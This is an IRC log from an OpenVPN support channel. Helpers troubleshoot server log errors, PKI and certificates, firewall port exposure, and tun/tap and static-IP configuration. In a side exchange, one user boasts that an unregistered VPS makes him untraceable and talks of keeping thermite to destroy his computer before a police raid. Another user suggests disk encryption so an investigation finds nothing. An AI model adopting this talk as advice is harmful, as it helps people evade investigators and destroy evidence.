And ideally start with verb 7 (or try 8/9 for fun if you don't get useful results, just to see what you do get) without *any* client connected, since you apparently get that error before your first client even connects 23:29 < baobeiiii> i'll run it for 10 mins on levels 7,8,9 then make a superrrrrrr long pastebin 23:30 < pekster> MaxDamage: Linux/Unix server? traditionally 'tunX' is a tun device and 'tapX' is a tap device. Technically you can name them whatever you want, but naming a tap device 'tun0' would be very foolish 23:30 < MaxDamage> pekster, that's what openvpn did. 23:30 < pekster> Then it's tun; you need to match the setting on both ends of the connection or openvpn will refuse to connect 23:31 < MaxDamage> Yeah, that's what I'd wager too :> 23:31 < pekster> baobeiiii: a separate paste per verb level is preferred; the output is likely to be quite large, although without connected clients it might be somewhat sane. If you don't see the proto 15 error at those levels, the output probably won't be helpful to me (since we're trying to debug what leads up to that event specifically) 23:32 < pekster> MaxDamage: If you haven't seen it: 23:32 < pekster> !howto 23:32 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 23:32 < MaxDamage> Yeah, I've read it when I first tried out openvpn. It worked great. 23:33 < baobeiiii> pekster, ok, running verb 7 for 10 without client, already see the proto 15 and some interesting messages 23:34 < MaxDamage> pekster, great success. I can now ssh over the vpn. 23:35 < pekster> Better gpg-encrypt files you send over ssh so that the encrypted file can be secured with ssh and can then be transported over a secured VPN tunnel. Just in case. 
23:36 < MaxDamage> pekster, i heard you like encryption, etc :> 23:41 < baobeiiii> pekster, verb 7 log http://pastebin.com/PgJmTg6f 23:41 < baobeiiii> thanks for helping get to the bottom of it :) 23:42 < MaxDamage> yeah, pekster is a really nice guy 23:45 < MaxDamage> pekster, do you have any guides on how exactly keys and certs work? I can't really understand the regional assignment and why it has to match between server and client if i'm going to have clients from different areas of the world 23:45 < pekster> Why on earth are dozens of IPs trying to contact that host? :\ 23:46 < pekster> !x509 23:46 < pekster> !pki 23:46 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that each other were signed by the right ca.key. Optionally, the client also checks that the server cert was 23:46 <@vpnHelper> signed specially as a server (see !servercert) 23:46 < pekster> MaxDamage: ^^ that 23:49 < pekster> baobeiiii: You might try running on a more obscure port, but all those "No TLS state for client" messages are apparently random hosts on the web trying to send data to your server and getting dropped when it doesn't match a connected client 23:50 < MaxDamage> pekster, that's all fine and dandy, but can I issue client keys with different regional assignment, or is that really not necessary or just plain silly? 23:50 < pekster> What is "regional assignment" ? 23:50 < MaxDamage> You know, when you generate a key, where it asks you for region, company name, etc 23:50 < baobeiiii> weird 23:51 < baobeiiii> that it would show up in openvpn log if they're not trying to connect as clients 23:51 < pekster> Oh, that's all cosmetic. My keys don't have anything defined except the CN 23:51 < pekster> MaxDamage: You can type "." 
when prompted for city/state/whatever if you use easy-rsa and it'll omit the field 23:52 < MaxDamage> I see. :> 23:52 < pekster> baobeiiii: Yea, exactly. But that's quite the assortment of IPs hitting your system. Apparently you're an "interesting" target 23:52 < pekster> All over the world too, from some whois lookups I'm doing on those IPs 23:53 < pekster> .ph, .no, .br 23:53 < MaxDamage> pekster, so it's usually wise to generate one key per client, so that I may revoke them if necessary 23:53 < pekster> Yup 23:53 < baobeiiii> are they trying to authenticate as actual clients or is it like those bots that try to ssh in all the time 23:54 < pekster> No, it is probably just some arbitrary UDP packet; you can't auth unless you have (or managed to steal/reverse-engineer) an x509 keypair 23:55 < pekster> I have several public systems that listen on UDP 1194, and they rarely, if ever, get stray packets. You're getting on the order of a dozen hits per minute 23:55 < MaxDamage> pekster, now that you mention that, how likely is it that the gubmint can crack encryption quickly? 
23:55 < MaxDamage> I do plan on using protocol encryption as well, over the VPN 23:55 < pekster> Use 2048 bit keys or higher and the best analysis is that the world's supercomputers all combined to attack you specifically could not do it 23:56 < MaxDamage> Yeah, I did generate them at 2048 23:56 < pekster> Of course, it's easier for $local_government to just raid your home in that event 23:56 < MaxDamage> I'm hoping my identity is never revealed for that to happen 23:56 < MaxDamage> :> 23:56 < MaxDamage> the VPS i have is given to me for free with zero registration in the host 23:57 < MaxDamage> so no way to trace me if i was to route out of the VPS and did things 23:57 < MaxDamage> though, i am saying these things over an unencrypted network ;_; 23:57 < pekster> The outer protocol can be used to see where a VPN connection originates, but not what the content of the communication is 23:57 < baobeiiii> nothing i can do about that, already have a firewall that drops everything except traffic bound for 22 and 1194 23:57 < baobeiiii> running at level 8 now 23:58 < MaxDamage> And by the time they need to raid me, I'd be paranoid enough to have thermite bombs ready to destroy my PC at any time at the flick of a button 23:58 < MaxDamage> so I should be fine 23:58 < MaxDamage> :> 23:58 < pekster> baobeiiii: Careful with verb 8; check it over to make sure it doesn't leak anything sensitive in the x509 private key; FYI, your verb 7 output had the HMAC keys, which is the --tls-auth stuff 23:58 < baobeiiii> MaxDamage, no need for physical damage just use truecrypt on your system drive or something 23:58 < baobeiiii> then after their investigation turns up nothing u can ask for your computer back 23:58 < MaxDamage> I'll be legally obligated to give them the keys, I think 23:59 < pekster> Not a real problem, although in theory with that someone could perform an auth attempt (it'll still fail unless they have a properly signed cert, though) 23:59 < baobeiiii> MaxDamage, you 
live in the UK? 23:59 < MaxDamage> No, Bulgaria 23:59 < baobeiiii> only country with jail time for not handing them over to my knowledge 23:59 < MaxDamage> but since we joined the EU, cyber laws have become iffy 23:59 < MaxDamage> datacentres were raided due to torrent trackers on them 23:59 < MaxDamage> the admins of those sites were also raided by spec ops with fully loaded MP5s pointed at their children --- Day changed Wed Feb 20 2013 00:00 < MaxDamage> so i'm not really taking chances here :> 00:00 < MaxDamage> regarding the pool of molten metal on the clay pot on my floor, i thought i was being robbed so i decided to destroy all my work 00:00 < MaxDamage> lol 00:07 < pekster> baobeiiii: source code says this in the comment about your 'No TLS state' errors: "This can occur due to bogus data or DoS packets." 00:07 < pekster> And that exactly matches what I suggested earlier 00:09 < baobeiiii> only kids or government would bother doing dos 00:10 < MaxDamage> lol 00:10 < MaxDamage> government is right 00:10 < MaxDamage> ours tried to dos our local torrent tracker 00:10 < MaxDamage> but didn't even use proper udp flood 00:10 < MaxDamage> so they just got firewalled :> 00:10 < baobeiiii> pekster, here's verb 8, i did spot proto 15 in there 00:10 < baobeiiii> http://pastebin.com/bmVSW4cY 00:11 < pekster> http://dpaste.org/kCKq6/ <-- the source function that's dropping your bogus/scan/DoS traffic 00:14 < pekster> baobeiiii: FYI, when we're done here, you should re-generate your ta.key file on all your infrastructure since it's been printed in plaintext. 
It's not your private key, but there's no point using an HMAC key if it's been in plaintext online 00:14 < pekster> (remember, that needs to match on each node, server and client alike) 00:14 < baobeiiii> thanks i'll do that 00:14 < pekster> Well, it *is* a private key, just not your private component of the X509 keypair 00:16 < baobeiiii> i dont see it in there 00:16 < baobeiiii> other than reference by its name secret.key 00:16 < pekster> Lines 289-294 on your latest (verb 8) paste. It was in at verb 7 too 00:20 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 00:20 < pekster> baobeiiii: More verbosity beyond the verb 8 output won't be of any more use; besides seeing that your server is being sent bogus packets from a variety of source countries/IPs, I don't really know any more than I did earlier. I'll have to dig in the source more tomorrow, but I still don't have a good answer why you're getting that 'unknown IP version=15' output :\ 00:21 -!- brute11k1 [~brute11k@89.249.235.210] has quit [Ping timeout: 276 seconds] 00:21 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 00:23 < pekster> baobeiiii: Were you the one that did weird stuff with netfilter to DNAT most of the entire port range to udp/1194? If so, that's possibly related (and you may want to change that to a smaller set of known-to-you random/obscure high ports) 00:23 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 00:24 < xtreme_> is it possible to create own openvpn gui? 00:24 < baobeiiii> pekster, yep lol 00:25 < baobeiiii> that could be the reason 00:25 < pekster> baobeiiii: Well, don't do that then. 
Use a more sane subset and you'll probably see that go away 00:25 < pekster> Maybe even all the unknown IP version=15 stuff too 00:26 < baobeiiii> only did that because china has some software that notices the tls handshake and after a short period of time blocks the port 00:26 < baobeiiii> this way i can just enter any random number in my client config without changing the server each time 00:26 < pekster> Right, but anyone who scans *any* of the 65k ports gets dumped to your ovpn instance 00:26 < baobeiiii> although eventually they just blocked the entire ip 00:26 < pekster> It's dropping the noise, but possibly by doing so spamming your logs 00:27 < baobeiiii> i'll change it to a 1000 range 00:27 < pekster> I'd do less than that even 00:27 < pekster> You clearly have shell access; just pick a small handful of non-contiguous ports 00:28 < pekster> Otherwise you become a magnet for bot scans 00:28 < baobeiiii> i dont see why, i mean given my firewall setup and the hmac firewall, a port scan shows all ports including 1194 as closed 00:28 < pekster> xtreme_: Sure, you can write a frontend in whatever language you'd like. You can interact with the openvpn process via the management interface: 00:28 < baobeiiii> only port you can see open is 22 00:28 < pekster> !management 00:28 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN 00:29 < pekster> baobeiiii: Not necessarily; that depends on your firewall ruleset. 
If I'm pen-testing and I find some ports return an icmp-port-unreach but others just get dropped, the distinction is quite curious 00:29 < baobeiiii> although I guess they still get through netfilter and to the openvpn daemon 00:29 < baobeiiii> hence the logs 00:30 < xtreme_> pekster thanks 00:34 -!- Orbi [~opera@anon-163-27.vpn.ipredator.se] has left #openvpn [] 00:42 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 252 seconds] 00:43 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 00:45 < baobeiiii> i would have to go with bogus theory 00:45 < baobeiiii> i changed it so the ports aren't all forwarded, still get those connection attempts 00:45 < baobeiiii> from ports outside my small range that can be forwarded 00:46 -!- mattock is now known as mattock_afk 00:48 -!- brute11k1 [~brute11k@89.249.235.210] has joined #openvpn 00:49 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 240 seconds] 00:50 < pekster> How is "stop network connections from reaching you by limiting attackable surface area" a bogus theory? 00:50 < baobeiiii> bogus data or dos 00:50 < pekster> Close all your ports *including* 1194 and forward, say, 35972 into 1194 (some random number I just made up) 00:50 < baobeiiii> not bogus theory 00:50 < baobeiiii> ok 00:51 < pekster> That'll stop the attack unless the attackers just get lucky or are sitting in this channel watching for the next port you open ;) 00:51 < baobeiiii> aha 00:53 < pekster> Be smarter about your firewalls next time. 
OpenVPN can't even handle more than 64 profiles, so using more than 64 ports at any given time is usually a waste 00:54 < pekster> Write some cute script to randomly pick 64 ports (not in a range, actually *random* ports) between say 20000 and 65000, and communicate the change to clients 00:54 < pekster> And really, probably just 15 or 20 is likely to be sufficient and reduce attackable surface even more 00:57 < pekster> Here's a bash snippet to possibly get you started: http://dpaste.org/gcpxW/ 01:00 -!- mattock_afk is now known as mattock 01:01 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 01:02 < baobeiiii> yea it worked 01:02 -!- brute11k2 [~brute11k@89.249.235.210] has joined #openvpn 01:03 < baobeiiii> this http://pastebin.com/Sfsq33Gb stopped those packets 01:03 -!- brute11k1 [~brute11k@89.249.235.210] has quit [Ping timeout: 276 seconds] 01:03 < baobeiiii> can't get a more restrictive firewall than that 01:04 < pekster> 'iptables-save' is the preferred way to show netfilter rules 01:05 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 255 seconds] 01:06 < pekster> But yea, limiting to 51 ports is a better idea compared to 65k 01:06 -!- xtreme_ [~wtf@193.28.228.85] has quit [Ping timeout: 255 seconds] 01:09 -!- b1rkh0ff [~b1rkh0ff@178.77.26.26] has quit [Ping timeout: 260 seconds] 01:15 -!- JPeterson [~JPeterson@213.103.210.215] has quit [Ping timeout: 245 seconds] 01:20 -!- brute11k2 [~brute11k@89.249.235.210] has quit [Quit: Leaving.] 01:21 -!- b1rkh0ff [~b1rkh0ff@178.77.12.33] has joined #openvpn 01:26 < baobeiiii> in a bash script like i posted normally the default chain rules (when drop) go at the bottom do they not 01:28 < pekster> It doesn't really matter. 
It's bad practice to use anything except the recommended iptables-save and iptables-restore for all the reasons the manpage lists 01:28 < baobeiiii> yea i just dont know how to write rules in that format 01:28 < pekster> You aren't going to find many people on Freenode (especially at #netfilter which is the relevant support channel) that are willing to help you with "iptables scripts" 01:31 < pekster> Try searching. https://duckduckgo.com/?q=iptables-save (faqs.org seems to have a semi-decent explanation for you) 01:31 <@vpnHelper> Title: iptables-save (Linux) at DuckDuckGo (at duckduckgo.com) 01:47 < baobeiiii> well, maybe this will be disappointing lol 01:47 < baobeiiii> but i've gotten rip of the ip proto 15 problem 01:48 < baobeiiii> by removing openvpn and going back to version 2.2.2 01:48 < baobeiiii> rid* 01:49 < baobeiiii> feels like a bad way to fix an issue, going back to outdated version 01:49 < pekster> If you don't need 2.3.x features, it's a fine solution. Although I wonder if it's not ipv6-related with some service your server runs that tries to poll something every minute 01:50 < pekster> fwiw, I speculated as much on this point yesterday 01:51 < baobeiiii> i re-used everything in the openvpn directory after downgrading 01:51 < baobeiiii> so it hints at it being 2.3 related 01:51 < baobeiiii> yea you're right probably 01:52 < baobeiiii> if 2.2.2 doesn't have those ip6 features it wouldn't be bothered by some service 02:01 -!- jaws [~root@5.231.5.192] has quit [Ping timeout: 248 seconds] 02:09 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 02:25 < baobeiiii> i'm happy with the firewall, apart from i can no longer ping 10.8.0.1, which i often do to check it's up 02:26 < pekster> So allow traffic that comes in on tun0 02:26 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 02:30 < baobeiiii> i'd ask how in netfilter but it seems like a shark tank 02:31 < pekster> Try searching for the -i switch in iptables(8) 02:32 < 
pekster> #netfilter has some good guides at the bottom of the primary /topic URL too; if you're that unfamiliar with netfilter/iptables, you should really spend the time to read one of the beginner's tutorials 02:34 -!- MaxDamage [Damage@46.238.18.82] has quit [Read error: Connection reset by peer] 02:41 -!- mirco_ [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 02:42 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 248 seconds] 02:42 -!- mirco_ is now known as mirco 02:53 -!- surfmasta [~bart@80.92.88.10] has joined #openvpn 02:59 < surfmasta> Hi, I have following setup: Clients (192.168.1.0/24) <-bridged network-> Router: 192.168.1.1 (OpenVPN client: 10.1.10.2) <-tunnel-> OpenVPN server: 10.0.0.1 (subnet 10.0.0.0/8) <-gateway-> Internet 03:00 < surfmasta> Now I have the problem that the packets coming in the OpenVPN server have the source IP 192.168.1.0/24, that's also something I can't change. I just have the power to make some configuration files on the OpenVPN client itself, but I would prefer to do something after the client side (on the server) 03:01 < surfmasta> and I want the packets to be mapped to source IPs in the 10.0.0.0/8 network when they go to the internet (internet is my own infrastructure, could also be an intranet) 03:03 < surfmasta> I would probably need something like an iptables-PREROUTING-SNAT, but SNAT just works in the POSTROUTING and that will be too late for me and when the packets already leave the OpenVPN server processing (tap device) then there could also be collisions in the mapping if more clients connect to it with the same subnetwork 192.168.1.0/24 03:05 < pekster> I don't have a clear picture of your network setup, but you seem to have multiple conflicting networks. You should fix that, or perform ugly NAT hackery to work around it. But fixing it is really what you should do 03:10 < pekster> surfmasta: You can see the --client-nat directive in the 2.3.0 version. 
It's nothing you couldn't already do with netfilter and NAT already, but it does it on your behalf. I think it's a bad solution, but it's there if you want to play with it 03:11 < surfmasta> ok thanks, i will take a look on this 03:12 < surfmasta> problem is that we want to have the client DSL-routers to be untouched as much as possible, and put an openvpn client on them, the only way that the client routers work with openvpn is a bridged network (Fritzbox) 03:13 < surfmasta> so we are limited in this step 03:14 < pekster> Sounds like you've started by shooting yourself in the foot with your requirements. NAT might save the rest of the body, but that kind of hackery is best avoided by not setting yourself up for unpleasantness from the start 03:15 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 03:15 < pekster> No idea why you're using bridging/tap either, but: 03:15 < pekster> !tunortap 03:15 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Don't waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 03:15 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 
03:15 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Read error: Connection reset by peer] 03:21 < baobeiiii> got ping working with iptables -A INPUT -i tun0 -p icmp --icmp-type echo-request -j ACCEPT 03:23 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:25 < pekster> Sounds reasonable 03:26 < sam1> !wins 03:26 <@vpnHelper> "wins" is http://oreilly.com/catalog/samba/chapter/book/ch07_03.html is a good link for seeing how to run WINS on samba 03:32 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:48 -!- aoconnell [~chatzilla@dsl-217-155-112-254.zen.co.uk] has joined #openvpn 03:50 < aoconnell> Hi, I have an openvpn server with a ton of clients that come and go, I know I can scrape the /var/log/openvpn-status.log, but can I use the -up and -down script triggers (or something similar) to trigger a bash/php script whenever a client gets added/removed? 03:51 < pekster> aoconnell: See the --client-disconnect and --client-connect scripts. 
I have a sample client-disconnect script that does some basic accounting about the client's session that's GPL code you're free to browse and either mod to taste or use as-is: 03:51 < pekster> !accounting 03:51 <@vpnHelper> "accounting" is http://pekster.sdf.org/code/files/openvpn-user-accounting.tgz for some bash code for basic accounting 03:52 < aoconnell> Thanks Pekster 03:59 -!- dazo_afk is now known as dazo 04:05 -!- aoconnell [~chatzilla@dsl-217-155-112-254.zen.co.uk] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0/20130215130331]] 04:11 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 252 seconds] 04:12 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 04:15 -!- baobeiiii [~baobeiiii@180.155.14.35] has quit [Quit: Leaving] 04:45 -!- Devastator- [~devas@186.214.110.45] has quit [Changing host] 04:45 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 04:45 -!- Devastator- is now known as Devastator 05:01 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 05:36 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 05:37 -!- mode/#openvpn [+o plaisthos] by ChanServ 05:52 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 06:14 -!- mndo [~mndo@bl17-91-212.dsl.telepac.pt] has joined #openvpn 06:43 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out] 06:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:03 -!- master_of_master [~master_of@p57B52866.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 07:05 -!- master_of_master [~master_of@p57B54352.dip.t-dialin.net] has joined #openvpn 07:12 -!- axelm7 [~axelm7@186.135.9.201] has joined #openvpn 07:16 -!- ihre [~kaas@office.shockmedia.nl] has joined #openvpn 07:16 -!- axelm7 [~axelm7@186.135.9.201] has quit [Ping timeout: 260 seconds] 07:19 -!- Valcorb 
[~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:21 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has joined #openvpn 07:22 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 07:26 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 07:26 < xtz> hey guys 07:26 < xtz> does anyone have an idea if --port-share had already been extended to work with ssh? 07:27 <@plaisthos> xtz: it has not 07:27 <@plaisthos> only for http 07:27 < xtz> crap 07:27 <@plaisthos> for ssh it is also difficult 07:28 <@ecrist> good morning folks 07:28 <@plaisthos> because not the client but the server sends the first reply 07:29 < xtz> plaisthos: got it. thx buddy 07:52 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 07:56 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 07:56 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 07:59 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 07:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 08:04 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:05 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:13 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 08:43 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 08:47 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 276 seconds] 08:48 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:48 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 09:00 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:14 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 09:16 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 264 seconds] 09:16 -!- nickanderson 
[~cmdln@ginger.pilgrimpage.com] has joined #openvpn 09:17 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 264 seconds] 09:31 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 09:32 -!- NChief [tomme@unaffiliated/nchief] has quit [Quit: gey] 09:34 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 09:40 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 248 seconds] 09:42 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 09:45 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 09:45 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Read error: Connection reset by peer] 09:57 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:02 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds] 10:10 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 10:11 -!- raidz_away is now known as raidz 10:30 -!- ihre [~kaas@office.shockmedia.nl] has quit [Quit: Lost terminal] 10:31 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 10:36 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 10:38 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 10:47 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:54 -!- Orbi [~opera@anon-163-27.vpn.ipredator.se] has joined #openvpn 11:05 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 11:06 -!- sauce [sauce@unaffiliated/sauce] has quit [Read error: Operation timed out] 11:07 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 11:07 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 11:10 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 11:10 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 12:06 -!- Cpt-Oblivious 
[Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:45 -!- NomeFalso [~Aralucc10@151.77.232.145] has joined #openvpn 12:46 < NomeFalso> hi I have an openvpn tun network installed and I'd like to use my XBMC as upnp server / client streaming videos thru it but it doesn't work. It works fine locally though... any advice? 12:46 < NomeFalso> upnp servers are not seen when using vpn 12:48 < pekster> uPnP uses subnet broadcast/multicast features that you don't get when using tun, which is an OSI Layer 3 (IP) level connection. You'd need tap for that 12:48 < pekster> https://en.wikipedia.org/wiki/Universal_Plug_and_Play#Protocol 12:48 <@vpnHelper> Title: Universal Plug and Play - Wikipedia, the free encyclopedia (at en.wikipedia.org) 12:49 < pekster> You might be able to use upnp, just not the discovery portion depending on how much you know about the target network ahead of time 12:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 252 seconds] 12:58 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Read error: Operation timed out] 13:04 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 13:05 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 13:05 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 13:07 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 13:07 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 13:34 -!- mndo [~mndo@bl17-91-212.dsl.telepac.pt] has quit [Ping timeout: 248 seconds] 13:42 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:42 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 13:47 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has joined #openvpn 13:50 < KaiForce> any fix for the crash of 2.3 on Win 7 (and 8?) 
when connecting as described here: https://forums.openvpn.net/topic11901.html 13:50 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN crash windows8 x64 - 2.3 build : Testing branch (at forums.openvpn.net) 13:51 < KaiForce> i've seen it on two win 7 machines. 13:53 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn 14:01 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 14:01 -!- mode/#openvpn [+o krzee] by ChanServ 14:02 -!- Perun [perun@chao5.net] has joined #openvpn 14:02 < Perun> hi all 14:02 <@dazo> KaiForce: has it been filed as a bug report in Trac? if not ... then the developers most likely haven't noticed this issue at all 14:03 < Perun> if I have server 10.0.4.0 255.255.255.0 in openvpn 'server' conf, then the server always gets the .1 address of this net... how can I configure another ip for the server? for example the .10? 14:04 <@dazo> Perun: don't use --server ... and read the man page about --server ... it describes exactly what this "macro" does there ... that way, you can do that yourself 14:05 < Perun> dazo: oh you mean "mode server ... " in the conf? 14:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:06 <@dazo> Perun: no ... I mean --server 14:06 <@krzee> whats wrong with .1? 14:06 <@krzee> ...are you using the same subnet as the lan? 14:06 < Perun> no 14:06 <@krzee> k good 14:06 < Perun> but my dns is already configured 14:08 <@dazo> Perun: http://openvpn.net/index.php/open-source/documentation/manuals/openvpn-21.html#lbAH 14:08 <@vpnHelper> Title: OpenVPN 2.1 (at openvpn.net) 14:08 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 14:08 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 14:08 <@krzee> do you have some ninja method of finding anchors or do you look at the src like i do? 14:09 < Perun> dazo: I understand hmm but in the example: ifconfig 10.8.0.1 10.8.0.2, who is the .2? 14:10 <@dazo> krzee: nope ... view source ... 
search and look for the tag ;-) 14:10 <@krzee> hehe ya same as i 14:10 <@krzee> !/30 14:10 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 14:10 <@krzee> Perun, to understand who the 2 is ^ 14:11 <@dazo> Perun: the 10.8.0.2 is calculated, based on the 10.8.0.0 from the --server argument 14:12 < Perun> aha ok 14:12 <@dazo> Perun: the sane way to do this ... is to use --topology subnet ... and ignore the net30 mode 14:13 < Perun> and if I dont define an ip pool I need to configure on each client its ip in the openvpn subnet? 14:13 <@dazo> I'm not sure it would start at all 14:13 <@dazo> I think it would complain 14:21 < Perun> dazo: but I can configure a static ip on each client? 14:22 <@krzee> !static 14:22 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder 14:22 < Perun> !ccd 14:22 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 14:25 < Perun> hmm what is the common-name? the common-name field in the ssl cert? 
14:25 <@dazo> yes
14:25 < Perun> aha
14:26 <@krzee> !certinfo
14:26 <@vpnHelper> "certinfo" is run `openssl x509 -in <cert> -noout -text` for info from your cert file
14:26 <@dazo> but some char replacement happens on the filename ... look for "character mangling" in the man page, iirc
